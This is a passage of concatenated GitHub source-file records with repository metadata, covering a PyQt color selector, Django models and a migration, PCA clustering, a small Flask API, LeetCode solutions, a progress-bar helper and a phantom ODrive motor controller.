\"\"\"\n\n self.itemColor = color\n self.define_stylesheets()\n\n # need this to update colors \n if self.selected:\n self.activate_me()\n else:\n self.inactivate_me()\n\n\n\n def define_stylesheets(self):\n \"\"\"\n Defines the stylesheets used for active/inactive look\n of this widget.\n \"\"\"\n\n buttonColor = QColor(self.itemColor).name()\n self._selectedStyleSheet = \"border-width: 2px;\" \\\n \"margin: 0px;\" \\\n \"padding: 6px;\" \\\n \"border-style: solid;\" \\\n \"border-color: black;\" \\\n \"background-color: \" + \\\n buttonColor + \";\" \n\n self._unselectedStyleSheet = \"border-width: 1px;\" \\\n \"margin: 7px;\" \\\n \"border-style: solid;\" \\\n \"border-color: black;\" \\\n \"background-color: \" + \\\n buttonColor + \";\" \n\n \n\n def mousePressEvent(self, event): \n \"\"\"\n Acts on mouse press events and uses the synchronizer\n for selecting.\n \"\"\"\n\n self._synchronizer.select(self)\n\n\n\n def activate_me(self):\n \"\"\"\n This slot activates the item.\n \"\"\"\n\n self.setStyleSheet(self._selectedStyleSheet)\n self.selected = True\n\n\n\n def inactivate_me(self):\n \"\"\"\n This slot inactivates the item.\n \"\"\"\n\n self.setStyleSheet(self._unselectedStyleSheet)\n self.selected = False\n\n\n\n\n#########################################################\n## \n## class for synchronizing color selector widgets\n##\n## NOTE: In contrast to the symbol selector synchronizer,\n## this one does not allow to deselect a color button,\n## i.e., some color has to be selected at all times\n##\n#########################################################\nclass ColorSynchronizer(QObject):\n\n\n def __init__(self, parent = None):\n\n QObject.__init__(self, parent)\n self._activeWidget = None\n self._activeColor = None\n\n\n\n def select(self, target):\n \"\"\" This method notifies the canvas that the color selector\n has changed.\n\n NOTE: We need to go via the canvas since it needs to keep\n track for the undo/redo framework.\n \n \"\"\"\n\n self.emit(SIGNAL(\"synchronized_object_changed\"), target) \n\n\n\n def change_active_color(self, newColor):\n \"\"\" This method notifies the canvas that the color of\n the currently active selector has changed.\n\n NOTE: We need to go via the canvas since it needs to keep\n track for the undo/redo framework.\n \n \"\"\"\n \n self.emit(SIGNAL(\"active_color_changed\"), newColor)\n\n \n\n def select_plain(self, target):\n \"\"\" This function does most of the work and is also\n called by the canvas redo/undo machinery after we emit\n synchronized_color_selector.\n\n \"\"\"\n\n if self._activeWidget != target:\n if self._activeWidget:\n self._activeWidget.inactivate_me()\n\n self._activeWidget = target\n self._activeWidget.activate_me()\n\n \n\n def get_active_widget(self):\n \"\"\" Simply returns the active widget to anybody who cares \n to know. 
\"\"\"\n\n return self._activeWidget\n\n\n\n \n","repo_name":"haskelladdict/sconcho","sub_path":"sconcho/gui/color_widget.py","file_name":"color_widget.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"39757168852","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0004_auto_20190319_1208'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='foreword',\n name='photo',\n field=models.ImageField(upload_to=b'photos/', null=True, verbose_name=\"Owner's Picture\", blank=True),\n ),\n ]\n","repo_name":"sonlinux/centro-pricetag","sub_path":"django_project/content/migrations/0005_foreword_photo.py","file_name":"0005_foreword_photo.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6098030250","text":"from sklearn.decomposition import PCA\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import KMeans\nimport pandas as pd\n\n\nclass DimensionReducer:\n def __init__(self, manager):\n self.manager = manager\n self.pca = PCA()\n self.tsne = TSNE(random_state=123, perplexity=5)\n\n def kmeans_clustering(self, components):\n total_explained_variance = 0\n for pc, explained_variance in enumerate(self.pca.explained_variance_ratio_):\n total_explained_variance += explained_variance\n if total_explained_variance < 0.5:\n continue\n else:\n break\n X = [component[:pc] for component in components]\n x = []\n y = []\n for data_point in X:\n x.append(data_point[0])\n y.append(data_point[1])\n model = KMeans(n_clusters=3)\n # fit the model\n model.fit(X)\n # assign a cluster to each example\n yhat = model.predict(X)\n return yhat\n\n @staticmethod\n def explained_variance_plot(dimension_reducer, *args, **kwargs):\n plt.figure(figsize=(8, 8))\n sns.lineplot(x=['Comp_{}'.format(index) for index, _ in enumerate(dimension_reducer.explained_variance_ratio_)],\n y=dimension_reducer.explained_variance_ratio_)\n plt.xticks(rotation=90)\n plt.ylabel('Variance explained ratio')\n if 'suffix' not in kwargs:\n plt.savefig('PCA_explained_variance.png')\n return\n plt.savefig('PCA_explained_variance_{}.png'.format(kwargs['suffix']))\n plt.close()\n\n def compare_group_and_cluster(self, clusters, *args, **kwargs):\n data_dict = {'0': [], '1': [], '2':[]}\n for index, cluster in enumerate(list(clusters)):\n if cluster == 0:\n data_dict['0'].append(self.original_group[index])\n elif cluster == 1:\n data_dict['1'].append(self.original_group[index])\n elif cluster == 2:\n data_dict['2'].append(self.original_group[index])\n data_to_plt = []\n groups = list(set(self.original_group))\n for k, v in data_dict.items():\n to_add = {'cluster': k}\n for group in groups:\n to_add[group] = v.count(group)\n data_to_plt.append(to_add)\n df = pd.DataFrame(data_to_plt)\n df = df.set_index(['cluster'])\n plt.figure()\n df.plot.bar(stacked=True)\n plt.xlabel(\"group\")\n # Add a legend\n plt.legend(loc='upper left')\n if 'suffix_final' not in kwargs:\n plt.savefig('cluster_group.png')\n return\n plt.savefig('cluster_group_{}.png'.format(kwargs['suffix_final']))\n plt.close()\n\n @property\n def original_group(self):\n group = []\n for k, v in self.manager.data_fetcher.data.items():\n 
group.append(v['group'])\n return group\n\n @staticmethod\n def first_2_dimension_plot(components, group, *args, **kwargs):\n first_2_dimension = [component[:2] for component in components]\n x = []\n y = []\n for data_point in first_2_dimension:\n x.append(data_point[0])\n y.append(data_point[1])\n plt.figure()\n sns.scatterplot(x=x, y=y, hue=group)\n if 'suffix_final' not in kwargs:\n plt.savefig('fist_2_dimension.png')\n return\n plt.savefig('first_2_dimension_{}.png'.format(kwargs['suffix_final']))\n plt.close()\n\n def pca_dimension_reduction(self, *args, **kwargs):\n if 'data' not in kwargs:\n X = np.array([v['data'] for k, v in self.manager.data_fetcher.data.items()])\n else:\n X = np.array([v['data'] for k, v in kwargs['data'].items()])\n components = self.pca.fit_transform(X)\n self.explained_variance_plot(self.pca, *args, **kwargs)\n self.first_2_dimension_plot(components,\n group=self.original_group,\n suffix_final='original_{}'.format(kwargs['suffix']))\n self.first_2_dimension_plot(components,\n group=self.kmeans_clustering(components),\n suffix_final='cluster_{}'.format(kwargs['suffix']))\n self.compare_group_and_cluster(self.kmeans_clustering(components),\n suffix_final='cluster_{}'.format(kwargs['suffix']))\n\n def tsne_dimension_reduction(self, *args, **kwargs):\n if 'data' not in kwargs:\n X = np.array([v['data'] for k, v in self.manager.data_fetcher.data.items()])\n else:\n X = np.array([v['data'] for k, v in kwargs['data'].items()])\n components = self.tsne.fit_transform(X)\n self.first_2_dimension_plot(components, *args, **kwargs)\n","repo_name":"s1060046/dimension_reduction","sub_path":"dimension_reduction/pca/dimension_reducer.py","file_name":"dimension_reducer.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20623287714","text":"from Listasligadas import LinkedList\n\nl=LinkedList()\nprint(f\"L esta vacioa? {l.is_empty()}\")\n\nl.append(10)\nl.append(5)\nl.append(6)\nl.append(20)\n\nprint(f\"L esta vacioa? 
{l.is_empty()}\")\nl.transversal()\n","repo_name":"MI177/edd_1310_2021","sub_path":"Clase17_11_2020/Pruebaslistasligadas.py","file_name":"Pruebaslistasligadas.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28483069504","text":"# https://leetcode.com/problems/simplify-path/\n\nclass Solution:\n def simplifyPath(self, path: str) -> str:\n simple = []\n \n for d in path.split('/'):\n if d in ['', '.']:\n continue\n if d == '..':\n if simple: simple.pop()\n else:\n simple.append(d)\n \n return '/' + '/'.join(simple)\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_35/simplify-path.py","file_name":"simplify-path.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13855718559","text":"from django.db import models\nfrom products.models import Product\nfrom django.conf import settings\n\n\nclass Order(models.Model):\n customer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True, blank=True) # ForeignKey to User model\n date_ordered = models.DateTimeField(auto_now_add=True)\n complete = models.BooleanField(default=False, null=True, blank=False)\n transaction_id = models.CharField(max_length=200, null=True)\n\n def __str__(self):\n return str(self.customer)\n\n @property\n def shipping(self):\n shipping = False\n order_items = self.orderitem_set.all()\n for item in order_items:\n if item.product.digital is False:\n shipping = True\n return shipping\n\n @property\n def get_cart_total(self):\n order_items = self.orderitem_set.all()\n total = sum([item.get_total for item in order_items])\n return total\n\n @property\n def get_cart_items(self):\n order_items = self.orderitem_set.all()\n total = sum([item.quantity for item in order_items])\n return total\n\n\nclass OrderItem(models.Model):\n product = models.ForeignKey(Product, on_delete=models.SET_NULL, blank=True, null=True)\n order = models.ForeignKey(Order, on_delete=models.SET_NULL, blank=True, null=True)\n quantity = models.IntegerField(default=0, null=True, blank=True)\n date_added = models.DateTimeField(auto_now_add=True)\n\n @property\n def get_total(self):\n total = self.product.price * self.quantity\n return total\n\n\nclass ShippingAddress(models.Model):\n customer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True)\n order = models.ForeignKey(Order, on_delete=models.SET_NULL, blank=True, null=True)\n address = models.CharField(max_length=200, null=True)\n city = models.CharField(max_length=200, null=True)\n state = models.CharField(max_length=200, null=True)\n zipcode = models.CharField(max_length=200, null=True)\n date_added = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.address\n","repo_name":"Amin-Aghili/subworkit","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41534492294","text":"#!venv/bin/python\nimport importlib\nimport os\nimport time\n\nfrom flask import Flask, jsonify, request\n\nfrom backend import ImageData, PATH_TO_IMAGES\n\nif not os.path.exists(PATH_TO_IMAGES):\n os.makedirs(PATH_TO_IMAGES)\n print(\"Starting loading images\")\n importlib.import_module('load-images')\n print(\"Images loaded\")\nelse:\n print(\"Images already downloaded to 
the disk\")\n\nimage_data = ImageData()\n\napp = Flask(__name__)\n\n@app.route('/api/v1.0/get-points/', methods=['GET'])\ndef get_points(userId):\n return jsonify({'points': 178})\n\n\n@app.route('/api/v1.0/check-location//', methods=['GET'])\ndef check_location(lng, lat):\n challenge_id, encoded_img = image_data.get_image_for_location(lng, lat)\n if encoded_img is not None:\n return jsonify({\"found\": 1, \"image\": encoded_img, \"challengeId\": challenge_id})\n else:\n return jsonify({\"found\": 0})\n\n@app.route('/api/v1.0/submit-challenge-photo', methods=['POST'])\ndef submit_challenge_photo():\n time.sleep(7)\n encoded_image = request.json[\"img\"]\n challenge_id = request.json[\"challengeId\"]\n result = image_data.compare_images(image_data.challenges[challenge_id], encoded_image)\n return jsonify({\"challengeId\": challenge_id, \"points\": result})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"deephack18/picstory-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12058055935","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'adjacency matrix'\n\n__author__ = 'lxp'\n\n#《大话数据结构》227页\n#在后面图的遍历会调用这个模块,在review时候发现。\n#后面的遍历针对的是无权无向图,在那两个模块中,判断联通的条件是权值为1\n#因为后两个模块要求的权值输入,若联通则权值输1\n\nimport numpy as np\n\nclass MGraph(object):\n\tdef __init__(self):\n\t\tself.vexs = []\n\t\tself.arc = None\n\t\tself.numVertexes = 0\n\t\tself.numEdges = 0\n\n\tdef createMGraph(self):\n\t\tself.numVertexes = int(input(\"请输入点数: \"))\n\t\tself.numEdges = int(input(\"请输入边数: \"))\n\t\tself.arc = np.zeros([self.numVertexes, self.numVertexes])\n\n\t\tfor x in range(self.numVertexes):\n\t\t\tself.vexs.append(input(\"依次输入顶点信息: \"))\n\n\t\tfor i in range(self.numVertexes):\n\t\t\tfor j in range(self.numVertexes):\n\t\t\t\tif i != j:\n\t\t\t\t\tself.arc[i][j] = float(\"inf\")\n\n\t\tfor x in range(self.numEdges):\n\t\t\tvi = int(input(\"请输入边(vi, vj)的下标i: \"))\n\t\t\tvj = int(input(\"请输入边(vi, vj)的下标j: \"))\n\t\t\tw = int(input(\"请输入边(vi, vj)的权重w: \"))\n\t\t\tself.arc[vi][vj] = self.arc[vj][vi] = w\n\t\t\t\n\t\treturn\n\n\tdef showMGraph(self):\n\t\tprint(self.arc)\n\t\treturn\n\n#test\ndef test():\n\tsample = MGraph()\n\tsample.createMGraph()\n\tsample.showMGraph()\n\treturn\n\nif __name__ == '__main__':\n\ttest()\n\n###input输入的是str,需要转换\n","repo_name":"LiuXPeng/pythonDataStructure","sub_path":"adjacencyMatrix.py","file_name":"adjacencyMatrix.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70732404394","text":"from flask import Blueprint\n\nfrom .resources import IndexResource\nfrom .resources.media import (\n create_media, \n list_media, \n get_media_by_id,\n delete_media_by_id,\n update_media_by_id\n)\n\nbp = Blueprint(\"restapi\", __name__, url_prefix=\"/api/v1\")\n\ndef init_app(app):\n bp.add_url_rule('/', 'index', IndexResource)\n bp.add_url_rule('/media', 'create_media', create_media, methods=['POST'])\n bp.add_url_rule('/media', 'list_media', list_media, methods=['GET'])\n bp.add_url_rule('/media/', 'get_media_by_id', get_media_by_id, methods=['GET'])\n bp.add_url_rule('/media/', 'delete_media_by_id', delete_media_by_id, methods=['DELETE'])\n bp.add_url_rule('/media/', 'update_media_by_id', update_media_by_id, methods=['PUT'])\n\n app.register_blueprint(bp)\n \n 
\n\n\n","repo_name":"IvanFrezzaJr/pond5","sub_path":"pond5/blueprints/resapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11090664867","text":"import re\nfrom datetime import timedelta as TimeDelta\n\nSECOND = TimeDelta(seconds=1)\nMINUTE = 60 * SECOND\nHOUR = 60 * MINUTE\nDAY = 24 * HOUR\nWEEK = 7 * DAY\nMONTH = 31 * DAY\nYEAR = 365 * DAY\n\nMILLISECOND = SECOND / 1000\n\nUNITS: dict[str, TimeDelta] = {\n 'ms': MILLISECOND,\n 'millisecond': MILLISECOND,\n 'milliseconds': MILLISECOND,\n 's': SECOND,\n 'second': SECOND,\n 'seconds': SECOND,\n 'm': MINUTE,\n 'minute': MINUTE,\n 'minutes': MINUTE,\n 'h': HOUR,\n 'hour': HOUR,\n 'hours': HOUR,\n 'd': DAY,\n 'day': DAY,\n 'days': DAY,\n 'w': WEEK,\n 'week': WEEK,\n 'weeks': WEEK,\n 'mo': MONTH,\n 'month': MONTH,\n 'months': MONTH,\n 'y': YEAR,\n 'year': YEAR,\n 'years': YEAR,\n}\n\n\nclass Rate:\n REGEX = re.compile(\n r'(?P[0-9]+)/(?P[0-9]*)(?P[a-zA-Z]+)'\n )\n\n def __init__(self, count: int, duration: TimeDelta):\n self.count = count\n self.duration = duration\n\n @classmethod\n def from_string(cls, s: str):\n m = cls.REGEX.match(s)\n if m is None:\n raise ValueError(f'\"{s}\" is not a valid rate string.')\n count = int(m.group('count'))\n unit_str = m.group('unit').lower()\n if unit_str not in UNITS:\n raise ValueError('\"{unit_str}\" is not a valid unit.')\n unit = UNITS[unit_str]\n duration = int(m.group('duration') or 1)\n return cls(count, duration * unit)\n\n @property\n def per_second(self) -> float:\n return self.count / self.duration.total_seconds()\n\n def __mul__(self, val: int | float | TimeDelta) -> float:\n if isinstance(val, TimeDelta):\n val = val.total_seconds()\n return val * self.per_second\n\n __rmul__ = __mul__\n","repo_name":"luhn/limited","sub_path":"limited/rate.py","file_name":"rate.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27616612433","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n def addBinary(self, a, b):\n \"\"\"\n :type a: str\n :type b: str\n :rtype: str\n \"\"\"\n len_a, len_b = len(a), len(b)\n if len_b > len_a:\n return self.addBinary(b, a)\n list_a, list_b, flag = list(a)[::-1], list(b)[::-1], 0\n for i in range(len_a):\n if i >= len_b:\n break\n res = flag + int(list_a[i]) + int(list_b[i])\n if res == 3:\n flag = 1\n list_a[i] = '1'\n elif res == 2:\n flag = 1\n list_a[i] = '0'\n else:\n flag = 0\n list_a[i] = str(res)\n if flag == 0:\n return ''.join(list_a[::-1])\n for i in range(len_b, len_a):\n res = flag + int(list_a[i])\n if res == 2:\n flag = 1\n list_a[i] = '0'\n else:\n flag = 0\n list_a[i] = str(res)\n if flag == 1:\n list_a.append('1')\n return ''.join(list_a[::-1])\n","repo_name":"ShawDa/Coding","sub_path":"leetcode/067二进制求和.py","file_name":"067二进制求和.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31928717496","text":"import pandas as pd\nfrom functools import wraps\nfrom flask import request\nimport os\n\n\ndef ingestion_init_data(path_file_csv, sep, engine, table_name):\n \"\"\"\n insert data to database.\n\n Parameters:\n path_file_csv (string): path file csv\n sep (string): delimiter in csv file. 
e.g. ';' or ','\n        engine (database engine): database engine\n        table_name: name of the table to insert the data into\n\n    \"\"\"\n    df = pd.read_csv(path_file_csv, sep=sep)\n    df.to_sql(name=table_name, con=engine, if_exists='replace', index=False)\n\n\ndef token_required(f):\n    @wraps(f)\n    def decorated(*args, **kwargs):\n        token = None\n\n        if \"X-API-KEY\" in request.headers:\n            token = request.headers[\"X-API-KEY\"]\n\n        if not token:\n            return {\"message\": \"Token is missing !!!\"}, 401\n        if token != os.getenv(\"TOKEN\"):\n            return {\"message\": \"Token is wrong !!!\"}, 401\n\n        return f(*args, **kwargs)\n    return decorated\n","repo_name":"nguyenkhacbaoanh/Messier-Catalogue","sub_path":"app/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"17579851309","text":"# file: xml_parse.py\n# author: Cedric Wille cwille97@bu.edu\n# description: Helper functions to convert XML data from the NTSB website into JSON format\n# date: 7/15/20\n\n# data we are parsing is a big XML download from: https://www.ntsb.gov/investigations/AccidentReports/_layouts/ntsb.aviation/Index.aspx\n\nimport json\n\ndef json_format(input):\n    '''A helper function to convert the XML pairs to JSON key value pairs'''\n\n    ret = ''\n    splitVals = input.split('\"') \n    counter = 1 # counter to keep track of whether we are on the key or value part of the kv pair\n    for val in splitVals:\n        if (counter % 2 == 0): # even count so it is a value part of the key value pair\n            val = '\"' + val + '\"'\n            if val != splitVals[-2]: # we don't want to add a comma to the last value\n                val += ', '\n            ret += val\n        else: # odd count so it is the key part which means we need to add quotes and a colon\n            if val != '':\n                val = val.replace(' ', '', 1) # remove space at front\n                val = val.replace('=', '')\n                val = '\"' + val + '\":'\n                ret += val\n        counter += 1\n    ret = ret[:-5]\n    return ret\n\n\ndef parse_initial_data(original, results): \n    '''This function is designed to take the original XML file as downloaded from the NTSB website and parse it into JSON'''\n    xml_data = open(original, \"r\")\n    results = open(results, \"w\")\n    results.write('{ \"items\": [')\n    for line in xml_data:\n        rows = line.split(\"<ROW\")\n        for row in rows:\n            row = row.replace('/>', '') # remove tags\n            row = row.replace('\\\\', '/') # replace backslashes with a forward slash because backslash is a Python escape character\n            newStr = \"{ \" + json_format(row) + \" }, \" # add brackets for this piece of data and call our helper function\n            newStr = newStr.replace('\"\":', '')\n            results.write(newStr)\n\n    xml_data.close()\n    results.write(\"] }\")\n    results.close()\n    print(\"finished converting the XML data to JSON\")\n\n# parse_initial_data('AviationData.xml', 'xml_results.json')\n\ndef check_json(filename):\n    '''Function to check if this is valid JSON by printing the JSON values corresponding to the string'''\n    json_data = open(filename, 'r')\n    for line in json_data:\n        data = json.loads(line)\n        print(data)\n\n# check_json('xml_results.json')\n\n","repo_name":"FaisalBinAhmed/Aviation-Accident-API","sub_path":"xml_parse.py","file_name":"xml_parse.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"71514511914","text":"import progressbar\nimport math\n\nbar = None\n\n\ndef init(max_epoch, batch_size, N, custom_text_dict):\n    global bar\n\n    bar = BarWrapper(max_epoch, batch_size, N, custom_text_dict)\n\n\nclass BarWrapper:\n    def 
__init__(self, max_epoch, batch_size, N, custom_text_dict):\n self.current_epoch = 0\n self.current_batch = 0\n\n self.max_batch = int(math.ceil(N / batch_size))\n max_value = max_epoch * self.max_batch\n\n base_text = '(Epoch: [%(epoch)d/%(max_epoch)d], Batch: [%(batch)d/%(max_batch)d]) '\n base_dict = dict(epoch=1, max_epoch=max_epoch, batch=1, max_batch=self.max_batch)\n\n custom_text = ''\n for key, value in custom_text_dict.items():\n custom_text += \"{} = %({}).6f, \".format(value, key)\n base_dict[key] = -1\n\n self.format_custom_text = progressbar.FormatCustomText(\n base_text + custom_text, base_dict,\n )\n\n widgets = [\n progressbar.Percentage(), ' ',\n progressbar.AnimatedMarker(), ' ',\n progressbar.Bar(marker='█'), ' ',\n progressbar.SimpleProgress(), ' ',\n self.format_custom_text, ' ',\n progressbar.ETA()\n ]\n\n self.bar = progressbar.ProgressBar(max_value=max_value, widgets=widgets)\n self.bar.start()\n\n def next_batch(self, custom_data):\n self.current_batch += 1\n\n if self.current_batch == self.max_batch + 1:\n self.current_batch = 1\n self.current_epoch += 1\n\n self.format_custom_text.update_mapping(\n epoch=self.current_epoch,\n batch=self.current_batch)\n\n self.format_custom_text.update_mapping(**custom_data)\n\n self.bar += 1\n\n def finish(self):\n progressbar.streams.flush()\n self.bar.finish()\n","repo_name":"JeGa/deepsplitting","sub_path":"python/deepsplitting/utils/global_progressbar.py","file_name":"global_progressbar.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9062872931","text":"# Module to run tests on scripts\n\n# TEST_UNICODE_LITERALS\n\nimport pytest\nimport os\n\nfrom specdb.specdb import IgmSpec\nfrom specdb import ssa as spdb_ssa\n\n#version = 'v01'\nversion = 'v02'\n\ndef data_path(filename):\n data_dir = os.path.join(os.path.dirname(__file__), 'files')\n return os.path.join(data_dir, filename)\n\ndef test_sdss_ssa_querydata():\n if os.getenv('SPECDB') is None: # Would need to generate a new debug file for this to work..\n assert True\n return\n igmsp = IgmSpec()#db_file=db_file)\n #\n ssa = spdb_ssa.SSAInterface(igmsp)\n votable = ssa.querydata('0.027228,0.515341', SIZE=1e-3)\n # Write\n votable.to_xml('sdss_querydata.xml')\n\n\ndef test_chalos_ssa_querydata():\n \"\"\" Mixes COS and HIRES\n \"\"\"\n if os.getenv('SPECDB') is None: # Would need to generate a new debug file for this to work..\n assert True\n return\n igmsp = IgmSpec()#db_file=db_file)\n #\n ssa = spdb_ssa.SSAInterface(igmsp)\n votable = ssa.querydata('344.4092,13.6793', SIZE=1e-3)\n # Write\n votable.to_xml('cos_querydata.xml')\n\n","repo_name":"specdb/igmspec","sub_path":"igmspec/tests/test_ssa.py","file_name":"test_ssa.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"19263691867","text":"\"\"\"\nThis code is used to test the GUI mechanics without any ODrive connected. 
It may not be up-to-date.\n\"\"\"\nimport time\nimport json\nimport copy\nimport numpy as np\nfrom pathlib import Path\n\nfrom ergocycleS2M.data_processing.save import save\nfrom ergocycleS2M.motor_control.enums import (\n ControlMode,\n control_modes_based_on_torque,\n control_modes_based_on_cadence,\n DirectionMode,\n)\nfrom ergocycleS2M.motor_control.motor_computations import MotorComputations\n\n\nparameters_path = Path(__file__).resolve().parent.parent / \"parameters\"\n\n\nclass Phantom(MotorComputations):\n \"\"\"\n Represents phantom class of the MotorController class: no odrive board need to be connected to use this class.\n \"\"\"\n\n def __init__(\n self,\n enable_watchdog=True,\n external_watchdog: bool = False,\n gains_path: str = str(parameters_path / \"gains.json\"),\n file_path: str = None,\n ):\n super(Phantom, self).__init__()\n self._watchdog_is_ready = False\n self._external_watchdog = external_watchdog\n self._watchdog_timeout = self.hardware_and_security[\"watchdog_timeout\"]\n self._watchdog_feed_time = self.hardware_and_security[\"watchdog_feed_time\"]\n print(\"Look for an odrive ...\")\n print(\"Odrive found\")\n self._watchdog_is_ready = self.config_watchdog(enable_watchdog)\n\n self._control_mode = ControlMode.STOP\n self._relative_pos = 0\n self._direction = DirectionMode.FORWARD\n self.previous_control_mode = ControlMode.STOP\n\n self._gains_path = gains_path\n\n if file_path:\n self.file_path = file_path\n else:\n self.file_path = \"XP/last_XP\"\n self.first_save = True\n self.t0 = 0.0\n\n def erase_configuration(self):\n \"\"\"\n Resets all config variables to their default values and reboots the controller.\n fibre.libfibre.ObjectLostError \"[LEGACY_OBJ] protocol failed with 3 - propagating error to application\" is not\n an issue.\n \"\"\"\n pass\n\n def save_configuration(self):\n \"\"\"\n Saves the current configuration to non-volatile memory and reboots the board.\n fibre.libfibre.ObjectLostError \"[LEGACY_OBJ] protocol failed with 3 - propagating error to application\" is not\n an issue.\n \"\"\"\n pass\n\n def config_watchdog(self, enable_watchdog: bool, watchdog_timeout: float = None):\n \"\"\"\n Configures a watchdog. If the odrive does not receive a watchdog before the time given in watchdog_timeout, it\n will disconnect.\n\n Parameters\n ----------\n enable_watchdog: bool\n Indicates if the user wants to enable the watchdog (True) or not (False)\n watchdog_timeout: float\n Maximum duration since the last feeding in s. If the watchdog has not been fed for more than\n `watchdog_timeout` the Odrive unable the motor.\n\n Returns\n -------\n watchdog_is_ready: bool\n Indicates if the watchdog is enabled or not\n \"\"\"\n if enable_watchdog:\n return True\n else:\n return False\n\n def _internal_watchdog_feed(self):\n \"\"\"\n Feeds the watchdog. To be called by a daemon thread.\n \"\"\"\n while True:\n time.sleep(self._watchdog_feed_time)\n\n def watchdog_feed(self):\n \"\"\"\n Feeds the watchdog. To be called by the user.\n \"\"\"\n pass\n\n def calibration(self, mechanical_load: bool = True):\n \"\"\"\n Calibrates the Odrive. 
It is advised to do one first full calibration under no mechanical load and to do a\n controller calibration under mechanical load each time the Odrive is turned on.\n\n Parameters\n ----------\n mechanical_load: bool\n Indicates if the motor is under mechanical load (True) or not (False).\n \"\"\"\n print(\"Start motor calibration\")\n print(\"Calibration done\")\n\n def has_error(self):\n \"\"\"\n Indicates if one or several errors has been detected (True) or not (False).\n \"\"\"\n return False\n\n def configuration(self):\n \"\"\"\n Configures the Odrive.\n \"\"\"\n print(\"Configuration for HALL encoder\")\n\n self.hardware_and_security_configuration()\n self.gains_configuration(custom=False)\n\n print(\"Configuration done\")\n\n def gains_configuration(\n self,\n custom: bool,\n pos_gain: float = None,\n k_vel_gain: float = None,\n k_vel_integrator_gain: float = None,\n current_gain: float = None,\n current_integrator_gain: float = None,\n bandwidth: float = None,\n ):\n \"\"\"\n custom: bool\n Indicates if the user wants to use the previously calculated gains saved in the .json (False) or to modify\n manually the gains (True).\n pos_gain: float\n k_vel_gain: float\n k_vel_integrator_gain: float\n current_gain: float\n current_integrator_gain: float\n bandwidth: float\n \"\"\"\n if not custom:\n with open(self._gains_path, \"r\") as gain_file:\n gains = json.load(gain_file)\n\n pos_gain = gains[\"pos_gain\"]\n k_vel_gain = gains[\"k_vel_gain\"]\n k_vel_integrator_gain = gains[\"k_vel_integrator_gain\"]\n current_gain = None\n current_integrator_gain = None\n bandwidth = gains[\"bandwidth\"]\n\n self.save_configuration()\n\n def hardware_and_security_configuration(self):\n \"\"\"\n Configures the settings linked to the hardware or the security not supposed to be changed by the user.\n \"\"\"\n pass\n\n def get_sign(self):\n \"\"\"\n Set the sign of the rotation depending on the rotation direction (reverse or forward).\n \"\"\"\n if self._direction == DirectionMode.FORWARD:\n return 1\n else:\n return -1\n\n def set_direction(self, mode: str):\n \"\"\"\n Set the direction to forward or reversed.\n\n Parameters\n ----------\n\n mode: DirectionMode\n \"\"\"\n self._direction = DirectionMode(mode)\n\n def get_direction(self):\n \"\"\"\n Get the direction.\n\n Returns\n -------\n mode: DirectionMode\n \"\"\"\n return self._direction\n\n def _check_ramp_rate(self, ramp_rate):\n \"\"\"\n Check that the acceleration registered by the user is under the acceleration limit.\n\n Parameters\n ----------\n ramp_rate: float\n Acceleration of the pedals (rpm/s)\n \"\"\"\n pass\n\n def turns_control(self, turns: float = 0.0):\n \"\"\"\n Makes the motors turn for the indicated number of turns.\n\n Parameters\n ----------\n turns: float\n The number of turns the motor will do.\n \"\"\"\n pass\n\n def zero_position_calibration(self):\n \"\"\"\n Calibration for the 0 deg.\n \"\"\"\n pass\n\n def position_control(self, angle: 